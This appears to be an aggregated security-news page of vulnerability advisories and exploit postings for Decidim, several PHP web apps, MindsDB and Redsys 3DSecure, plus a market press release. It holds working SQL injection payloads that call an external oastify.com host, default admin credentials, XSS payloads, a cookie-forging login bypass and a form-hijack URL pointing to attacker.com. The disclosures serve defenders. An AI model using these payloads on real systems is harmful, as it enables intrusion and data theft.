### Impact
The admin panel is subject to potential XSS attach in case an admin assigns a valuator to a proposal, or does any other action that generates an admin activity log where one of the resources has an XSS crafted. 

### Patches

N/A

### Workarounds

Redirect the pages /admin and /admin/logs to other admin pages to prevent this access (i.e. `/admin/organization/edit`)

### References

OWASP ASVS v4.0.3-5.1.3


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-32034

**Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin activity log**

Moderate severity GitHub Reviewed Published Sep 16, 2024 in decidim/decidim • Updated Sep 16, 2024

**Package**

**Affected versions**

<= 0.27.6

\>= 0.28.0, <= 0.28.1

**Patched versions**

0.27.7

0.28.2

**Impact**

The admin panel is subject to potential XSS attach in case an admin assigns a valuator to a proposal, or does any other action that generates an admin activity log where one of the resources has an XSS crafted.

**Patches**

N/A

**Workarounds**

Redirect the pages /admin and /admin/logs to other admin pages to prevent this access (i.e. /admin/organization/edit)

**References**

OWASP ASVS v4.0.3-5.1.3

**References**

*   GHSA-rx9f-5ggv-5rh6

Published to the GitHub Advisory Database

Sep 16, 2024

Last updated

Sep 16, 2024

GHSA-rx9f-5ggv-5rh6: Decidim::Admin vulnerable to cross-site scripting (XSS) in the admin activity log

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi### Bonus: FU + RCE & XSS - Information disclosure## Author: nu11secur1ty## Date: 09/14/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submittedin the password parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get all theinformation from the database of this system, and he can do very maliciousaction against the owner of this application!STATUS: HIGH- Vulnerability for deprecation!WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!https://github.com/oretnom23[+]Exploits:- SQLi Multiple:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT9033=9033 AND ('ehPW'='ehPW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw---```## Reproduce:[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)## Time spent:00:17:00

Ship Ferry Ticket Reservation System 1.0 SQL Injection

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

**IFSC Code Finder Portal 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c8714f261d6bcdc7f5ee89b4f1473342ced816a03f174b9a8bc607a329616e0

Download | Favorite | View

**IFSC Code Finder Portal 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/ifsc-code-finder-project-using-php/                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/ifscfinder/admin/login.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

IFSC Code Finder Portal 1.0 Insecure Settings

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-6656-03 - Migration Toolkit for Runtimes 1.2.7 release Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a cross site scripting vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6656.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Migration Toolkit for Runtimes security, bug fix and enhancement updateAdvisory ID:        RHSA-2024:6656-03Product:            Migration Toolkit for RuntimesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6656Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2022-36033====================================================================Summary: Migration Toolkit for Runtimes 1.2.7 releaseRed Hat Product Security has rated this update as having a security impact of Moderate.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Migration Toolkit for Runtimes 1.2.7 ImagesSecurity Fix(es):* org.jsoup/jsoup: The jsoup cleaner may incorrectly sanitize crafted XSS attempts if SafeList.preserveRelativeLinks is enabled (CVE-2022-36033)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2022-36033References:https://access.redhat.com/security/updates/classification/#moderatehttps://issues.redhat.com/browse/WINDUPRULE-1050

Red Hat Security Advisory 2024-6656-03

Webpay E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Cross Site Scripting

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

PRESS RELEASE

DELRAY BEACH, Fla., Sept. 10, 2024 /PRNewswire/ -- The global Security Testing Market size is projected to grow from USD 14.5 billionin 2024 to USD 43.9 billion by 2029 at a Compound Annual Growth Rate (CAGR) of 24.7% during the forecast period, according to a new report by MarketsandMarkets™.

One of the key factors promoting the security testing will be the increasing incidence of cyberattacks that target the software's vulnerabilities. However, the organizations, being in the digitalized world are getting more and more dependent on the digital applications that require the identification of the system's security risks and their resolution before the potential exploitation of such risks by the attackers which is becoming the new crucial practice. This rising concern pushes organizations to adopt the security testing process in order to guard their systems, data, and reputation from the possible breaches.

Request Sample Pages@ https://www.marketsandmarkets.com/requestsampleNew.asp?id=150407261

Based on the application testing tools, SAST accounts for the highest market size during the forecast period.

The adoption of Static Application Security Testing (SAST) tools is increasing as organizations prioritize secure software development. SAST tools enable developers to identify and fix security vulnerabilities early in the coding process, reducing the risk of security flaws in production. This shift is driven by the growing emphasis on integrating security into the software development lifecycle (SDLC) and the need to comply with stringent security standards. As a result, more companies are adopting SAST tools to enhance code security, improve development efficiency, and ensure that applications are robust against cyber threats from the outset.

By Application security testing type, web application security testing accounts for the highest market size during the forecast period.

The adoption of web application security testing is growing as organizations increasingly rely on web-based platforms for business operations and customer interactions. With the rise in cyber threats targeting web applications, such as SQL injection and cross-site scripting (XSS), companies are prioritizing security testing to identify and mitigate vulnerabilities before they can be exploited. This proactive approach is driven by the need to protect sensitive data, ensure compliance with regulations, and maintain customer trust in an environment where web applications are a critical part of the business landscape.

Inquire Before Buying@ https://www.marketsandmarkets.com/Enquiry\_Before\_BuyingNew.asp?id=150407261

By Region, Asia Pacific will grow at the highest CAGR during the forecast period.

The adoption of security testing services in the Asia Pacific region is rapidly increasing due to the region's expanding digital economy and the rising threat of cyberattacks. As businesses in Asia-Pacific embrace digital transformation and cloud computing, the need to identify and address vulnerabilities in their systems has become crucial. Regulatory pressures and growing awareness of cybersecurity risks are also driving organizations to invest in security testing solutions to ensure the resilience of their IT infrastructure and protect sensitive data from breaches. This trend is further fueled by the region's diverse and complex threat landscape, prompting a proactive approach to cybersecurity.

Top Key Companies in Security Testing Market:

IBM (US), HCLTech (India), Synopsys (US), OpenText (UK), Cigniti (US), Qualitest (UK), Intertek (UK), DXC Technology (US), eInfochips (US), Checkmarx (US), HackerOne (US), Invicti (US), DataArt (US), Cobalt Labs (US), Trustwave (US), Contrast Security (US), Veracode (US), Qualys (US), OffSec (US), NCC Group (UK), GitHub (US), Bugcrowd (US), Applause (US), Rapid7 (US), Parasoft (US), BreachLock (US), ImmuniWeb (Switzerland), Pentest People (UK), SafeAeon (US), and REDTEAM.PL (Poland) are the key players and other players in the Security Testing Market.

Browse Adjacent Market: Information Security Market Research Reports & Consulting

Browse Other Reports:

Blockchain Security Market - Global Forecast to 2029

IoT Security Market - Global Forecast to 2029

Exposure Management Market\- Global Forecast to 2029

Next-Generation Firewall Market\- Global Forecast to 2028

Digital Signature Market\- Global Forecast to 2028

Get access to the latest updates on Security Testing Companies and Security Testing Industry

About MarketsandMarkets™ 

MarketsandMarkets™ has been recognized as one of America's best management consulting firms by Forbes, as per their recent report.

MarketsandMarkets™ is a blue ocean alternative in growth consulting and program management, leveraging a man-machine offering to drive supernormal growth for progressive organizations in the B2B space. We have the widest lens on emerging technologies, making us proficient in co-creating supernormal growth for clients.

Earlier this year, we made a formal transformation into one of America's best management consulting firms as per a survey conducted by Forbes.

The B2B economy is witnessing the emergence of $25 trillion of new revenue streams that are substituting existing revenue streams in this decade alone. We work with clients on growth programs, helping them monetize this $25 trillion opportunity through our service lines - TAM Expansion, Go-to-Market (GTM) Strategy to Execution, Market Share Gain, Account Enablement, and Thought Leadership Marketing.

Built on the 'GIVE Growth' principle, we work with several Forbes Global 2000 B2B companies - helping them stay relevant in a disruptive ecosystem. Our insights and strategies are molded by our industry experts, cutting-edge AI-powered Market Intelligence Cloud, and years of research. The KnowledgeStore™ (our Market Intelligence Cloud) integrates our research, facilitates an analysis of interconnections through a set of applications, helping clients look at the entire ecosystem and understand the revenue shifts happening in their industry.

To find out more, visit www.MarketsandMarkets™.com or follow us on Twitter, LinkedIn and Facebook.

Security Testing Market Worth $43.9B by 2029

A cross-site scripting (XSS) vulnerability exists in all versions of the MindsDB platform, enabling the execution of a JavaScript payload whenever a user enumerates an ML Engine, database, project, or dataset containing arbitrary JavaScript code within the web UI.

**MindsDB Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 12, 2024 to the GitHub Advisory Database • Updated Sep 12, 2024

GHSA-32fj-r8qw-r8w8: MindsDB Cross-site Scripting vulnerability

3DSecure version 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website for form submissions, enabling data theft.

    Product: 3DSecure 2.0Manufacturer: RedsysAffected Version(s): 3DSecure 2.0 3DS Method AuthenticationTested Version(s): 3DSecure 2.0 3DS Method AuthenticationVulnerability Type: Cross-Site Scripting (XSS)Risk Level: MediumSolution Status: Not yet fixedManufacturer Notification: 2024-01-17Solution Date: N/APublic Disclosure: 2024-09-17CVE Reference: CVE-2024-25285Overview:3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website for form submissions, enabling data theft.Vulnerability Details:The threeDSMethodNotificationURL parameter is vulnerable to modification, allowing attackers to redirect form submissions to malicious destinations.Proof of Concept (PoC):By modifying the threeDSMethodNotificationURL parameter in a POST request, an attacker can change the form's action URL. Example:https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88zeSolution:No solution is currently available. Redsys has been notified.References:OWASP Web Security Testing Guide: Form Action HijackingDiscoverer:Reported by Rubén López Herrera________________________________Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição

Tag

#xss